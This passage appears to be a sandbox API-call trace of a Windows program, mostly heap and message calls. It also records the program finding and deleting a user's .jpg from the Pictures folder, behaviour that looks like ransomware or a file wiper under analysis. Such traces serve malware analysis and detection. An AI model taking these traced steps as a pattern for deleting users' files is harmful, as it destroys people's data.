(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.818] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.818] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.818] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.818] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.819] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.819] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0188.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.820] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0188.820] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.820] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.820] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.821] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.821] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.821] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.821] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.821] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.821] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0188.821] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0188.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0188.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.822] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.822] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg", lpFilePart=0x0) returned 0x58 [0188.822] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe325e90, ftCreationTime.dwHighDateTime=0x1d5d907, ftLastAccessTime.dwLowDateTime=0x67965860, ftLastAccessTime.dwHighDateTime=0x1d5e2b2, ftLastWriteTime.dwLowDateTime=0x15c5d700, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x113c3, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="3TvBEt HM8KLbxN.jpg", cAlternateFileName="3TVBET~1.JPG")) returned 0x90af58 [0188.822] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\3tvbet hm8klbxn.jpg")) returned 1 [0188.825] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe325e90, ftCreationTime.dwHighDateTime=0x1d5d907, ftLastAccessTime.dwLowDateTime=0x67965860, ftLastAccessTime.dwHighDateTime=0x1d5e2b2, ftLastWriteTime.dwLowDateTime=0x15c5d700, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x113c3, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="3TvBEt HM8KLbxN.jpg", cAlternateFileName="3TVBET~1.JPG")) returned 0 [0188.825] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.827] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.827] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.829] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0188.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.830] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0188.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.831] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0188.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0188.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0188.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0188.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.833] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.833] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0188.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.833] 